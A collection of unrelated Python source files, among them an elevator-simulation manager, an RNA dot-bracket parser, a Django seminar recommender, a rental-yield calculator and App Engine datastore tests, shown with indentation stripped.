x = L + (R - L) / 2
y = B + (T - B) / 2
kwargs['translate'] = { 'x' : -x, 'y': -y }
Shape.__init__(self, **kwargs)
self.updatePath()
def setPath(self):
self.path = makePath(self.glyph, closed=self.closed)
def render(self, ctx, renderer):
Shape.render(self, ctx, renderer)
|
somaidade = 0
maioridadehomem = 0
totmulher20 = 0
nomevelho = ''
for dados in range(1, 5):
print('----- {}ª PESSOA -----'.format(dados))
nome = str(input('Nome: ')).strip()
idade = int(input('Idade: '))
sexo = str(input('Sexo [M/F]: ')).strip()
somaidade += idade
if dados == 1 and sexo in 'Mm':
maioridadehomem += idade
nomevelho = nome
if sexo in 'Mm' and idade > maioridadehomem:
maioridadehomem = idade
nomevelho = nome
if sexo in 'Ff' and idade < 20:
totmulher20 += 1
mediaidade = somaidade / 4
print('A média de idades do grupo é {} anos'.format(mediaidade))
print('O homem mais velho do grupo se chama {} e tem {} anos'.format(nome, maioridadehomem))
print('Ao todo são {} mulheres de menos de 20 anos'.format(totmulher20))
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import random
from collections import deque
from rlschool.liftsim.environment.mansion.elevator import Elevator
from rlschool.liftsim.environment.mansion.utils import PersonType
from rlschool.liftsim.environment.mansion.utils import MansionAttribute, MansionState, ElevatorState
from rlschool.liftsim.environment.mansion.utils import EPSILON, ENTERING_TIME
from rlschool.liftsim.environment.mansion.mansion_config import MansionConfig
from rlschool.liftsim.environment.mansion.person_generators.generator_proxy import PersonGenerator
from rlschool.liftsim.environment.mansion.person_generators.person_generator import PersonGeneratorBase
class MansionManager(object):
"""
Mansion Class
Mansion Randomly Generates Person that requiring elevators for a lift
"""
def __init__(
self,
elevator_number,
person_generator,
mansion_config,
name="Mansion"):
"""
Initializing the Building
Args:
floor_number: number of floor in the building
elevator_number: number of elevator in the building
floor_height: height of single floor
time_step: Simulation timestep
person_generator: PersonGenerator class that generates stochastic pattern of person flow
Returns:
None
"""
assert isinstance(mansion_config, MansionConfig)
assert isinstance(person_generator, PersonGeneratorBase)
self._name = name
self._config = mansion_config
self._floor_number = self._config.number_of_floors
self._floor_height = self._config.floor_height
self._dt = self._config.delta_t
self._elevator_number = elevator_number
self._person_generator = person_generator
# if people are waiting for more than 300 seconds, he would give up!
self._given_up_time_limit = 300
#used for statistics
self._statistic_interval = int(600 / self._dt)
self._delivered_person = deque()
self._generated_person = deque()
self._abandoned_person = deque()
self._cumulative_waiting_time = deque()
self._cumulative_energy_consumption = deque()
self.reset_env()
def reset_env(self):
self._elevators = []
for i in range(self._elevator_number):
self._elevators.append(
Elevator(start_position=0.0,
mansion_config=self._config,
name="%s_E%d" % (self._name, i + 1)))
self._config.reset()
self._person_generator.link_mansion(self._config)
# whether the go up/down button is clicked
self._button = [[False, False] for i in range(self._floor_number)]
self._wait_upward_persons_queue = [
deque() for i in range(
self._floor_number)]
self._wait_downward_persons_queue = [
deque() for i in range(
self._floor_number)]
@property
def state(self):
"""
Return Current state of the building simulator
"""
upward_req = []
downward_req = []
state_queue = []
for idx in range(self._floor_number):
if(self._button[idx][0]):
upward_req.append(idx + 1)
if(self._button[idx][1]):
downward_req.append(idx + 1)
for i in range(self._elevator_number):
state_queue.append(self._elevators[i].state)
return MansionState(state_queue, upward_req, downward_req)
def run_mansion(self, actions):
"""
Perform one step of simulations
Args:
actions: A list of actions, e.g., action.add_target = [2, 6, 8], action.remove_target = [4]
mark the target floor to be added into the queue or removed from the queue
Returns:
State, Cumulative Wating Time for Person, Energy Consumption of Elevator
"""
self._config.step() # update the current time
person_list = self._person_generator.generate_person()
tmp_generated_person = len(person_list)
for person in person_list:
if(person.SourceFloor < person.TargetFloor):
self._wait_upward_persons_queue[person.SourceFloor -
1].appendleft(person)
elif(person.SourceFloor > person.TargetFloor):
self._wait_downward_persons_queue[person.SourceFloor - 1].appendleft(
person)
energy_consumption = [0.0 for i in range(self._elevator_number)]
# carry out actions on each elevator
for idx in range(self._elevator_number):
self._elevators[idx].set_action(actions[idx])
# make each elevator run one step
loaded_person_num = 0
tmp_delivered_person = 0
for idx in range(self._elevator_number):
energy_consumption[idx], delivered_person_time, tmp_loaded_person = self._elevators[idx].run_elevator()
tmp_delivered_person += len(delivered_person_time)
loaded_person_num += tmp_loaded_person
for floor in range(self._floor_number):
if(len(self._wait_upward_persons_queue[floor]) > 0):
self._button[floor][0] = True
else:
self._button[floor][0] = False
if(len(self._wait_downward_persons_queue[floor]) > 0):
self._button[floor][1] = True
else:
self._button[floor][1] = False
ele_idxes = [i for i in range(self._elevator_number)]
random.shuffle(ele_idxes)
for ele_idx in ele_idxes:
floor, delta_distance = self._elevators[ele_idx].nearest_floor
is_open = self._elevators[ele_idx].is_fully_open and (
abs(delta_distance) < 0.05)
is_ready = self._elevators[ele_idx].ready_to_enter
# Elevator stops at certain floor and the direction is consistent
# with the customers' target direction
floor_idx = floor - 1
if(is_open):
if(self._elevators[ele_idx]._direction == 1):
self._button[floor_idx][0] = False
elif(self._elevators[ele_idx]._direction == -1):
self._button[floor_idx][1] = False
if(is_ready and is_open):
self._config.log_debug(
"Floor: %d, Elevator: %s is open, %d persons are waiting to go upward, %d downward", floor, self._elevators[ele_idx].name, len(
self._wait_upward_persons_queue[floor_idx]), len(
self._wait_downward_persons_queue[floor_idx]))
if(self._elevators[ele_idx]._direction == -1):
for i in range(
len(self._wait_downward_persons_queue[floor_idx]) - 1, -1, -1):
entering_person = self._wait_downward_persons_queue[floor_idx][i]
req_succ = self._elevators[ele_idx].person_request_in(
entering_person)
if(req_succ):
del self._wait_downward_persons_queue[floor_idx][i]
self._config.log_debug(
"Person %s is walking into the %s elevator",
entering_person,
self._elevators[ele_idx].name)
else: # if the reason of fail is overweighted, try next one
if not self._elevators[ele_idx]._is_overloaded_alarm:
break
elif(self._elevators[ele_idx]._direction == 1):
# if no one is entering
for i in range(
len(self._wait_upward_persons_queue[floor_idx]) - 1, -1, -1):
entering_person = self._wait_upward_persons_queue[floor_idx][i]
req_succ = self._elevators[ele_idx].person_request_in(
entering_person)
if(req_succ):
del self._wait_upward_persons_queue[floor_idx][i]
self._config.log_debug(
"Person %s is walking into the %s elevator",
entering_person,
self._elevators[ele_idx].name)
else:
if not self._elevators[ele_idx]._is_overloaded_alarm:
break
# Remove those who waited too long
give_up_persons = 0
for floor_idx in range(self._floor_number):
for pop_idx in range(
len(self._wait_upward_persons_queue[floor_idx]) - 1, -1, -1):
if(self._config.raw_time - self._wait_upward_persons_queue[floor_idx][pop_idx].AppearTime > self._given_up_time_limit):
self._wait_upward_persons_queue[floor_idx].pop()
give_up_persons += 1
else:
break
for pop_idx in range(
len(self._wait_downward_persons_queue[floor_idx]) - 1, -1, -1):
if(self._config.raw_time - self._wait_downward_persons_queue[floor_idx][pop_idx].AppearTime > self._given_up_time_limit):
self._wait_downward_persons_queue[floor_idx].pop()
give_up_persons += 1
else:
break
cumulative_waiting_time = 0
for i in range(self._floor_number):
cumulative_waiting_time += self._dt * \
len(self._wait_upward_persons_queue[i])
cumulative_waiting_time += self._dt * \
len(self._wait_downward_persons_queue[i])
cumulative_waiting_time += loaded_person_num * self._dt
cumulative_energy_consumption = float(sum(energy_consumption))
self._delivered_person.appendleft(tmp_delivered_person)
self._generated_person.appendleft(tmp_generated_person)
self._abandoned_person.appendleft(give_up_persons)
self._cumulative_waiting_time.appendleft(cumulative_waiting_time)
self._cumulative_energy_consumption.appendleft(cumulative_energy_consumption)
if(len(self._delivered_person) > self._statistic_interval):
self._delivered_person.pop()
self._generated_person.pop()
self._abandoned_person.pop()
self._cumulative_waiting_time.pop()
self._cumulative_energy_consumption.pop()
return cumulative_waiting_time, cumulative_energy_consumption, give_up_persons
def get_statistics(self):
"""
Get Mansion Statistics
"""
return {
"DeliveredPersons(10Minutes)": int(sum(self._delivered_person)),
"GeneratedPersons(10Minutes)": int(sum(self._generated_person)),
"AbandonedPersons(10Minutes)": int(sum(self._abandoned_person)),
"EnergyConsumption(10Minutes)": float(sum(self._cumulative_energy_consumption)),
"TotalWaitingTime(10Minutes)": float(sum(self._cumulative_waiting_time))}
@property
def attribute(self):
"""
returns all kinds of attributes
"""
return MansionAttribute(
self._elevator_number,
self._floor_number,
self._floor_height)
@property
def config(self):
"""
Returns config of the mansion
"""
return self._config
@property
def waiting_queue(self):
"""
Returns the waiting queue of each floor
"""
return [self._wait_upward_persons_queue, self._wait_downward_persons_queue]
@property
def loaded_people(self):
"""
Returns: the number of loaded people of each elevator
"""
return [self._elevators[i].loaded_people_num for i in range(self._elevator_number)]
@property
def name(self):
"""
Returns name of the mansion
"""
return self._name
|
#
# Copyright © 2022 Christos Pavlatos, George Rassias, Christos Andrikos,
# Evangelos Makris, Aggelos Kolaitis
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the “Software”), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from typing import Tuple, Dict
from enum import Enum
class State(Enum):
NONE = 0
LEFT_CORE = 1
RIGHT_CORE = 2
class Stem(Enum):
RIGHT = "right"
LEFT = "left"
class Dot2Pair:
"""
Parse dot bracket expressions and extract positions of stems
"""
SYMBOL_MAP = {"(": ")", "[": "]", ")": "(", "]": "["}
OPPOSITE_SYMBOL_MAP = {")": "]", "(": "[", "[": "(", "]": ")"}
def __init__(self, dot_bracket: str):
"""A new parser set to parse the related dot bracket.
:return: a DotParser instance
"""
self.dot_bracket = dot_bracket
# these flags are going to be set
# whenever we have a match a pseudoknot lookup ...
self.state = State.NONE
self.stack = {Stem.RIGHT: [], Stem.LEFT: []}
try:
first_symbol = next(x for x in self.dot_bracket if x in self.SYMBOL_MAP)
except StopIteration:
raise ValueError(f"{self.dot_bracket} has no stem symbols")
self.left_open_symbol = first_symbol
self.right_open_symbol = self.OPPOSITE_SYMBOL_MAP[first_symbol]
self.left_close_symbol = self.SYMBOL_MAP[self.left_open_symbol]
self.right_close_symbol = self.SYMBOL_MAP[self.right_open_symbol]
# result stack
self._result = {
"right_core_stems": [],
"left_core_stems": [],
"right_stems": [],
"left_stems": [],
}
def parse_dot(self):
for position, char in enumerate(self.dot_bracket):
self.__char_digest(position, char)
if any(self.stack.values()):
raise ValueError(f"imbalanced stems {self.stack}")
def __char_digest(self, position: int, char: str):
"""
:return: side-effects
"""
if char == self.left_open_symbol:
self.stack[Stem.LEFT].append(position)
elif char == self.left_close_symbol:
binding = self.stack[Stem.LEFT].pop()
is_core = self.state == State.LEFT_CORE
if is_core:
self.state = State.RIGHT_CORE
self.__add_pair(Stem.LEFT, (binding, position), is_core)
elif char == self.right_open_symbol:
self.stack[Stem.RIGHT].append(position)
if self.state == State.NONE:
self.state = State.LEFT_CORE
elif char == self.right_close_symbol:
binding = self.stack[Stem.RIGHT].pop()
is_core = self.state == State.RIGHT_CORE
if is_core:
self.state = State.NONE
self.__add_pair(Stem.RIGHT, (binding, position), is_core)
def __add_pair(self, key: Stem, pair: Tuple[int, int], is_core: bool):
key = f"{key.value}{'_core' if is_core else ''}_stems"
self._result[key].append(pair)
@property
def result(self):
return self._result
def find_matches(dot_bracket: str) -> Dict[int, int]:
"""
parse dot bracket. return dictionary of matching stems. If no stems exist,
an empty dictionary is returned.
"""
try:
dot2pair = Dot2Pair(dot_bracket)
dot2pair.parse_dot()
except ValueError:
return {}
matches = {}
for stems in dot2pair.result.values():
for start, end in stems:
matches[start] = end
matches[end] = start
return matches
def get_confusion_matrix(truth: str, prediction: str, slack: int = 0):
truth_matches = find_matches(truth)
prediction_matches = find_matches(prediction)
assert len(truth) == len(prediction)
tp, tn, fp, fn = 0, 0, 0, 0
for idx in range(0, len(truth)):
tmatch = truth_matches.get(idx, None)
pmatch = prediction_matches.get(idx, None)
if tmatch is None:
if pmatch is None:
tn += 1
else:
# TODO: check disabled test, at index 0
fp += 1
else:
if pmatch is None:
fn += 1
# TODO: check disabled test, at index 1
else:
if abs(pmatch - tmatch) <= slack:
tp += 1
else:
fp += 1
return tp, tn, fp, fn
def get_core_stem_indices(dot_bracket: str):
"""
Returns core stem indices for the dot bracket. If pred does not
have a pseudoknot, a ValueError or an IndexError is raised.
"""
dot2pair = Dot2Pair(dot_bracket)
dot2pair.parse_dot()
result = dot2pair.result
right_core = result["right_core_stems"][0]
left_core = result["left_core_stems"][0]
return left_core[0], right_core[0], left_core[1], right_core[1]
def get_correct_core_stems(truth: str, pred: str, slack: int = 0) -> int:
"""
Returns number of correct core stems for the prediction. If there is
pseudoknot in the predicted dot bracket, a ValueError is raised.
"""
try:
tstems = get_core_stem_indices(truth)
pstems = get_core_stem_indices(pred)
except IndexError:
return 0
left_ok = abs(tstems[0] - pstems[0]) + abs(tstems[2] - pstems[2]) <= slack
right_ok = abs(tstems[1] - pstems[1]) + abs(tstems[3] - pstems[3]) <= slack
return left_ok + right_ok
|
from rest_api import db
from datetime import datetime
# attachment for tracking logs / user posts, many to one
class AttachmentModel(db.Model):
__tablename__ = "attachments"
id = db.Column(db.Integer, primary_key=True)
attachment_name = db.Column(db.String(200), nullable=False, unique=True)
# need inverse relation so order retrieves all its tracking logs
track_log_id = db.Column(db.Integer, db.ForeignKey("tracking_logs.id"))
date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
is_deleted =db.Column(db.Integer, default=0)
def __init__(self, attachment_name, track_log_id):
self.attachment_name = attachment_name
self.track_log_id = track_log_id
def json(self):
return {
"id":self.id,
"attachment_name":self.attachment_name,
"track_log_id": self.track_log_id
}
@classmethod
def find_by_id(cls, id):
return cls.query.filter_by(id=id, is_deleted=0).first()
@classmethod
def find_by_track_log_id(cls, track_log_id):
return cls.query.filter_by(track_log_id=track_log_id)
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
self.is_deleted=1
db.session.add(self)
db.session.commit()
|
price = int(input("Give me the price of this place! "))
rent = int(input("and what's the rent per week? "))
bodyC = int(input("and the body corporate per quarter? "))
RatesLand = int(input("What do the land rates look like per quarter? "))
RatesWater = int(input("Finally, I'll need the water rates per quarter? "))
def conv(x):
return(price * float(0.07) / 52)
def rconv(x):
return(rent * 52 / price * 100)
def pconv(y):
return(((rent * 52) - (bodyC * 4)) / price * 100)
def lconv(z):
return(((rent * 52) - (bodyC * 4) - (RatesLand * 4)) / price * 100)
def wconv(y):
return(((rent * 52) - (bodyC * 4) - (RatesLand * 4) - (RatesWater * 4)) / price * 100)
Yearly_Water = wconv(RatesWater)
Yearly_Land = lconv(RatesLand)
yearly_yield_BC = pconv(bodyC)
yearly_rent = rconv(rent)
yearly_yield = conv(price)
print(f"\nThis is your rental yield excluding Body Corporate {yearly_rent}% ")
print(f"This is your rental yield including Body Corporate {yearly_yield_BC}% ")
print(f"Body Corporate and land rates is {Yearly_Land}% yield. ")
print(f"\nSo you're final yield will be at {Yearly_Water}% compared to {yearly_rent}% ")
|
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'seminar-roulette.settings')
import django
django.setup()
from backend.models import *
import csv
import os
import random
import pandas as pd
import numpy as np
import math
from django.utils import timezone
from scipy.sparse.linalg import svds
class Recommender:
"""
Recommender system code adapted from online tutorial.
Partial credit goes to Nick Becker.
https://beckernick.github.io/matrix-factorization-recommender/
"""
def __init__(self, user):
ratings_list = []
# For each user in database
for university_user in UniversityUser.objects.all().order_by('guid'):
# For each seminar in database
for seminar in Seminar.objects.all().order_by('title'):
try:
# Check if user has a seminar history model create for that seminar
seminar_history = SeminarHistory.objects.get(
user=university_user, seminar=seminar
)
# Check if user has rated that seminar
if seminar_history.discarded:
rating = math.nan
else:
rating = int(seminar_history.rating)
except SeminarHistory.DoesNotExist:
rating = math.nan
# Append user, seminar and rating to a list
ratings_list.append((university_user.guid, seminar.id, rating))
# Create data frame for ratings list
ratings_df = pd.DataFrame(
ratings_list, columns=['guid', 'seminar', 'rating']
)
# Fill seminars which user hasn't rated with 0's
combined_df = ratings_df.pivot(
index='guid', columns='seminar', values='rating'
).fillna(0)
guids, seminars, ratings_mean, ratings_demeaned = self.get_data(
combined_df
)
self.recommendations = self.recommend(
guids, seminars, ratings_mean, ratings_demeaned, user.guid
)
def get_data(self, ratings):
guids = ratings.index.tolist()
seminars = ratings.columns.tolist()
ratings = ratings.values
ratings_mean = np.mean(ratings, axis=1)
# Normalise by each user's mean
ratings_demeaned = ratings - ratings_mean.reshape(-1, 1)
return guids, seminars, ratings_mean, ratings_demeaned
def recommend(self, guids, seminars, ratings_mean, ratings_demeaned, guid):
# Calculate singular value decomposition
U, sigma, Vt = svds(ratings_demeaned, k=5)
# Convert to diagonal matrix form
sigma = np.diag(sigma)
# Make predictions
predicted_ratings = np.dot(np.dot(U, sigma),
Vt) + ratings_mean.reshape(-1, 1)
predictions_df = pd.DataFrame(
predicted_ratings, index=guids, columns=seminars
)
# Manipulate data frame and sort by GUID
df_sorted = predictions_df.loc[[
guid
]].transpose().sort_values(by=guid, ascending=False)
return df_sorted.index.values
def recommendation_engine(user):
recommendation_seminars = []
recommendations = Recommender(user).recommendations
# Loop through the user's recommendations
for recommendation in recommendations:
# Get upcoming seminar if it is recurring
upcoming_seminar = Seminar.objects.filter(
id=recommendation
).order_by('start_time').first()
recommendation_seminars.append(upcoming_seminar)
# Get seminars which user has attended OR discarded
seminar_history = user.seminarhistory_set.filter(
Q(attended=True) | Q(discarded=True)
)
seminars_attended_discarded = Seminar.objects.filter(id__in=seminar_history)
seminars = []
count, seminar_count = 0, 0
# Get 5 seminar recommendations
while count < 5 and seminar_count < len(recommendation_seminars):
seminar = recommendation_seminars[seminar_count]
# Check user hasn't previously attended the seminar and that it is in the future
if seminar not in seminars_attended_discarded and seminar is not None and seminar.is_future:
seminars.append(recommendation_seminars[seminar_count])
count += 1
seminar_count += 1
return seminars
|
# LeetCode 888. Fair Candy Swap `E`
# 1sk | 92% | 7'
# A~0v06
class Solution:
def fairCandySwap(self, A: List[int], B: List[int]) -> List[int]:
setB = set(B)
dif = (sum(B)-sum(A)) // 2
for a in A:
if a + dif in setB:
return [a, a+dif]
|
# -*- coding: utf-8 -*-
"""
Tests for tipfy.appengine.db
"""
import unittest
import hashlib
from google.appengine.ext import db
from google.appengine.api import datastore_errors
from werkzeug.exceptions import NotFound
from tipfy.appengine import db as ext_db
import test_utils
class FooModel(db.Model):
name = db.StringProperty(required=True)
name2 = db.StringProperty()
age = db.IntegerProperty()
married = db.BooleanProperty()
data = ext_db.PickleProperty()
slug = ext_db.SlugProperty(name)
slug2 = ext_db.SlugProperty(name2, default='some-default-value', max_length=20)
etag = ext_db.EtagProperty(name)
etag2 = ext_db.EtagProperty(name2)
somekey = ext_db.KeyProperty()
class FooExpandoModel(db.Expando):
pass
class BarModel(db.Model):
foo = db.ReferenceProperty(FooModel)
class JsonModel(db.Model):
data = ext_db.JsonProperty()
class TimezoneModel(db.Model):
data = ext_db.TimezoneProperty()
@ext_db.retry_on_timeout(retries=3, interval=0.1)
def test_timeout_1(**kwargs):
counter = kwargs.get('counter')
# Let it pass only in the last attempt
if counter[0] < 3:
counter[0] += 1
raise db.Timeout()
@ext_db.retry_on_timeout(retries=5, interval=0.1)
def test_timeout_2(**kwargs):
counter = kwargs.get('counter')
# Let it pass only in the last attempt
if counter[0] < 5:
counter[0] += 1
raise db.Timeout()
raise ValueError()
@ext_db.retry_on_timeout(retries=2, interval=0.1)
def test_timeout_3(**kwargs):
# Never let it pass.
counter = kwargs.get('counter')
counter[0] += 1
raise db.Timeout()
class TestModel(test_utils.BaseTestCase):
def test_no_protobuf_from_entity(self):
res_1 = ext_db.get_entity_from_protobuf([])
self.assertEqual(res_1, None)
res_2 = ext_db.get_protobuf_from_entity(None)
self.assertEqual(res_2, None)
def test_no_entity_from_protobuf(self):
res_1 = ext_db.get_entity_from_protobuf([])
self.assertEqual(res_1, None)
def test_one_model_to_and_from_protobuf(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
pb_1 = ext_db.get_protobuf_from_entity(entity_1)
entity_1 = ext_db.get_entity_from_protobuf(pb_1)
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
def test_many_models_to_and_from_protobuf(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_2 = FooModel(name='bar', age=30, married=True)
entity_2.put()
entity_3 = FooModel(name='baz', age=45, married=False)
entity_3.put()
pbs = ext_db.get_protobuf_from_entity([entity_1, entity_2, entity_3])
self.assertEqual(len(pbs), 3)
entity_1, entity_2, entity_3 = ext_db.get_entity_from_protobuf(pbs)
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
self.assertEqual(isinstance(entity_2, FooModel), True)
self.assertEqual(entity_2.name, 'bar')
self.assertEqual(entity_2.age, 30)
self.assertEqual(entity_2.married, True)
self.assertEqual(isinstance(entity_3, FooModel), True)
self.assertEqual(entity_3.name, 'baz')
self.assertEqual(entity_3.age, 45)
self.assertEqual(entity_3.married, False)
def test_get_protobuf_from_entity_using_dict(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_2 = FooModel(name='bar', age=30, married=True)
entity_2.put()
entity_3 = FooModel(name='baz', age=45, married=False)
entity_3.put()
entity_dict = {'entity_1': entity_1, 'entity_2': entity_2, 'entity_3': entity_3,}
pbs = ext_db.get_protobuf_from_entity(entity_dict)
entities = ext_db.get_entity_from_protobuf(pbs)
entity_1 = entities['entity_1']
entity_2 = entities['entity_2']
entity_3 = entities['entity_3']
self.assertEqual(isinstance(entity_1, FooModel), True)
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
self.assertEqual(isinstance(entity_2, FooModel), True)
self.assertEqual(entity_2.name, 'bar')
self.assertEqual(entity_2.age, 30)
self.assertEqual(entity_2.married, True)
self.assertEqual(isinstance(entity_3, FooModel), True)
self.assertEqual(entity_3.name, 'baz')
self.assertEqual(entity_3.age, 45)
self.assertEqual(entity_3.married, False)
def test_get_or_insert_with_flag(self):
entity, flag = ext_db.get_or_insert_with_flag(FooModel, 'foo', name='foo', age=15, married=False)
self.assertEqual(flag, True)
self.assertEqual(entity.name, 'foo')
self.assertEqual(entity.age, 15)
self.assertEqual(entity.married, False)
entity, flag = ext_db.get_or_insert_with_flag(FooModel, 'foo', name='bar', age=30, married=True)
self.assertEqual(flag, False)
self.assertEqual(entity.name, 'foo')
self.assertEqual(entity.age, 15)
self.assertEqual(entity.married, False)
def test_get_reference_key(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity_1_key = str(entity_1.key())
entity_2 = BarModel(key_name='first_bar', foo=entity_1)
entity_2.put()
entity_1.delete()
entity_3 = BarModel.get_by_key_name('first_bar')
# Won't resolve, but we can still get the key value.
self.assertRaises(db.Error, getattr, entity_3, 'foo')
self.assertEqual(str(ext_db.get_reference_key(entity_3, 'foo')), entity_1_key)
def test_get_reference_key_2(self):
# Set a book entity with an author reference.
class Author(db.Model):
name = db.StringProperty()
class Book(db.Model):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
author = Author(name='Stephen King')
author.put()
book = Book(key_name='the-shining', title='The Shining', author=author)
book.put()
# Now let's fetch the book and get the author key without fetching it.
fetched_book = Book.get_by_key_name('the-shining')
self.assertEqual(str(ext_db.get_reference_key(fetched_book, 'author')), str(author.key()))
#===========================================================================
# db.populate_entity
#===========================================================================
def test_populate_entity(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertEqual(entity_1.name, 'bar')
self.assertEqual(entity_1.age, 20)
self.assertEqual(entity_1.married, True)
def test_populate_entity_2(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertRaises(AttributeError, getattr, entity_1, 'city')
def test_populate_expando_entity(self):
entity_1 = FooExpandoModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertEqual(entity_1.name, 'bar')
self.assertEqual(entity_1.age, 20)
self.assertEqual(entity_1.married, True)
def test_populate_expando_entity_2(self):
entity_1 = FooExpandoModel(name='foo', age=15, married=False)
entity_1.put()
self.assertEqual(entity_1.name, 'foo')
self.assertEqual(entity_1.age, 15)
self.assertEqual(entity_1.married, False)
ext_db.populate_entity(entity_1, name='bar', age=20, married=True, city='Yukon')
entity_1.put()
self.assertRaises(AttributeError, getattr, entity_1, 'city')
#===========================================================================
# db.get_entity_dict
#===========================================================================
def test_get_entity_dict(self):
class MyModel(db.Model):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.')
values = ext_db.get_entity_dict(entity)
self.assertEqual(values, {
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
})
def test_get_entity_dict_multiple(self):
class MyModel(db.Model):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.')
entity2 = MyModel(animal='bird', species=7,
description='A bird, an animal that flies well.')
values = ext_db.get_entity_dict([entity, entity2])
self.assertEqual(values, [
{
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
},
{
'animal': 'bird',
'species': 7,
'description': 'A bird, an animal that flies well.',
}
])
def test_get_entity_dict_with_expando(self):
class MyModel(db.Expando):
animal = db.StringProperty()
species = db.IntegerProperty()
description = db.TextProperty()
entity = MyModel(animal='duck', species=12,
description='A duck, a bird that swims well.',
most_famous='Daffy Duck')
values = ext_db.get_entity_dict(entity)
self.assertEqual(values, {
'animal': 'duck',
'species': 12,
'description': 'A duck, a bird that swims well.',
'most_famous': 'Daffy Duck',
})
#===========================================================================
# get..._or_404
#===========================================================================
def test_get_by_key_name_or_404(self):
entity_1 = FooModel(key_name='foo', name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_by_key_name_or_404(FooModel, 'foo')
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_by_key_name_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_by_key_name_or_404, FooModel, 'bar')
def test_get_by_id_or_404(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_by_id_or_404(FooModel, entity_1.key().id())
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_by_id_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_by_id_or_404, FooModel, -1)
def test_get_or_404(self):
entity_1 = FooModel(name='foo', age=15, married=False)
entity_1.put()
entity = ext_db.get_or_404(entity_1.key())
self.assertEqual(str(entity.key()), str(entity_1.key()))
def test_get_or_404_2(self):
self.assertRaises(NotFound, ext_db.get_or_404, db.Key.from_path('FooModel', 'bar'))
def test_get_or_404_3(self):
self.assertRaises(NotFound, ext_db.get_or_404, 'this, not a valid key')
#===========================================================================
# db.Property
#===========================================================================
def test_pickle_property(self):
data_1 = {'foo': 'bar'}
entity_1 = FooModel(key_name='foo', name='foo', data=data_1)
entity_1.put()
data_2 = [1, 2, 3, 'baz']
entity_2 = FooModel(key_name='bar', name='bar', data=data_2)
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
self.assertEqual(entity_1.data, data_1)
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_2.data, data_2)
def test_slug_property(self):
entity_1 = FooModel(key_name='foo', name=u'Mary Björk')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'Tião Macalé')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
entity_2 = FooModel.get_by_key_name('bar')
self.assertEqual(entity_1.slug, 'mary-bjork')
self.assertEqual(entity_2.slug, 'tiao-macale')
def test_slug_property2(self):
entity_1 = FooModel(key_name='foo', name=u'---')
entity_1.put()
entity_2 = FooModel(key_name='bar', name=u'___')
entity_2.put()
entity_1 = FooModel.get_by_key_name('foo')
